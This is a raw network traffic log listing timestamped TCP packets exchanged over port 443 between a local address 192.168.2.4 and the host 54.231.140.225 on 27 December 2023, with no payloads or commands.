Dec 27, 2023 18:12:20.308875084 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.308880091 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309135914 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309149981 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309214115 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.309216976 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309230089 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309248924 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309289932 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309303045 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.309303045 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.309309959 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309350014 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.309397936 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309412003 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309446096 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309448004 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.309453964 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309475899 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.309500933 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.309592009 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309607029 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309633017 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309664965 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.309664965 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.309669971 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309705973 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.309819937 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309834003 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309866905 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309900045 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.309900045 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.309904099 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.309942007 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.310153008 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.310170889 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.310215950 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.310220957 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.310241938 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.310379982 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.310393095 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.310432911 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.310436964 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.310480118 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.310558081 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.310575008 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.310615063 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.310619116 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.310641050 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.310739994 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.310751915 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.310786009 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.310790062 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.310815096 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.311007023 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.311027050 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.311060905 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.311064959 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.311100960 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.311253071 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.311265945 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.311333895 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.311333895 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.311340094 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.311526060 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.311544895 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.311573982 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.311578989 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.311604977 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.311733007 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.311745882 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.311780930 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.311784983 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.311836004 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.312062979 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.312083006 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.312117100 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.312123060 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.312170982 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.312170982 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.312186956 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.312246084 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.312246084 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.312249899 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.312526941 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.312542915 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.312597036 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.312597036 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.312603951 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313025951 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313038111 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313086033 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.313091040 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313098907 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313107014 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.313116074 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313138008 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.313138962 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.313144922 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313172102 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.313359976 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313373089 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313447952 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313458920 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.313458920 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.313461065 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313468933 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313503981 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.313539982 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.313654900 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313678980 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313739061 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.313739061 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.313745975 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313807011 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.313847065 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313862085 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313909054 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.313911915 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.313932896 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.313950062 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.314193010 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.314205885 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.314248085 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.314282894 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.314286947 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.314393044 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.314440012 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.314455032 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.314526081 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.314526081 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.314531088 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.314574003 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.314722061 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.314732075 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.314795971 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.314800024 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.314841032 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.315083981 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.315099001 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.315143108 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.315149069 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.315181017 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.315181017 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.315268040 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.315280914 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.315327883 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.315331936 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.315346956 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.315376043 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.315525055 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.315537930 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.315623999 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.315623999 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.315629959 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.315687895 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.315768003 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.315782070 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.315818071 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.315823078 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.315857887 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.315857887 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.315900087 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.315913916 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.315956116 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.315960884 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.316005945 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.316108942 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.316123962 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.316173077 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.316176891 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.316232920 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.316354990 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.316369057 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.316416025 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.316420078 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.316452026 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.316452026 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.316639900 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.316668034 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.316694975 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.316698074 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.316709042 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.316715956 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.316734076 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.316744089 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.316747904 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.316766977 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.316792965 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.316941977 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.316956043 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.316998005 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.317002058 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.317009926 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.317028046 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.317030907 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.317125082 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.317130089 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.317146063 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.317164898 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.317183971 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.317194939 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.317200899 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.317224026 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.317270041 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.317413092 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.317429066 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.317477942 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.317477942 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.317482948 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.317540884 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.317723989 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.317739964 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.317831993 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.317837000 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.317850113 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.317908049 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.317931890 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.317949057 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.318016052 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.318016052 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.318022013 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.318073988 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.318140984 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.318155050 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.318209887 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.318217993 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.318226099 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.318252087 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.318504095 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.318517923 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.318564892 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.318564892 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.318571091 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.318665028 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.318695068 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.318710089 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.318780899 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.318780899 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.318785906 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.318813086 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.318819046 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.318823099 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.318835974 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.318907976 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.318907976 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.318917036 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.318953991 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.319130898 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319147110 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319216967 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.319216967 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.319221973 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319271088 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319277048 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319277048 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.319284916 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319381952 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.319405079 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319418907 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319457054 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.319459915 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319468975 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.319499016 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.319581032 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319596052 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319699049 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.319699049 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.319703102 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319762945 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.319796085 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319809914 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319854975 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.319860935 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319894075 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.319894075 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.319973946 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.319988012 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.320046902 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.320051908 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.320116997 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.320173979 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.320188999 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.320245981 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.320245981 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.320250988 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.320290089 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.320441961 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.320456028 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.320513010 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.320517063 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.320563078 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.320563078 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.320571899 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.320589066 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.320609093 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.320615053 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.320650101 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.320650101 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.505866051 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.505897045 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.505964994 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506002903 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506015062 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506015062 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506036997 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506047010 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506050110 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506077051 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506103039 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506108999 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506136894 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506150961 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506159067 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506206036 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506206036 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506211042 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506227970 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506247997 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506284952 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506289005 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506305933 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506315947 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506340027 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506391048 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506391048 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506396055 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506416082 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506434917 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506474018 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506477118 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506484985 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506495953 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506520987 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506547928 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506556034 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506582022 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506588936 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506603956 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506669044 CET	49737	443	192.168.2.4	54.231.140.225
